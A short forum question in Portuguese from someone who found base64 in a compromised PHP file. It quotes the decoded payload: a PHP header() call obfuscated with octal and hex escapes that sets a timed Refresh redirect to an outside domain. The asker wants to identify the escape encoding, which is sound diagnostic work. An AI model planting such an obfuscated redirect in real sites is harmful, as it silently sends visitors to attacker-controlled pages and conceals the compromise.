Encontrei algum texto codificado em base64 em um arquivo php comprometido. Quando decodifiquei a string base64, era a seguinte diretiva:
header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");
Que tipo de codificação é essa string de URL? Pensei hex inicialmente, depois ascii, mas seu comprimento variável. Eu fiz o google, mas sem sucesso. Alguém pode me apontar na direção certa?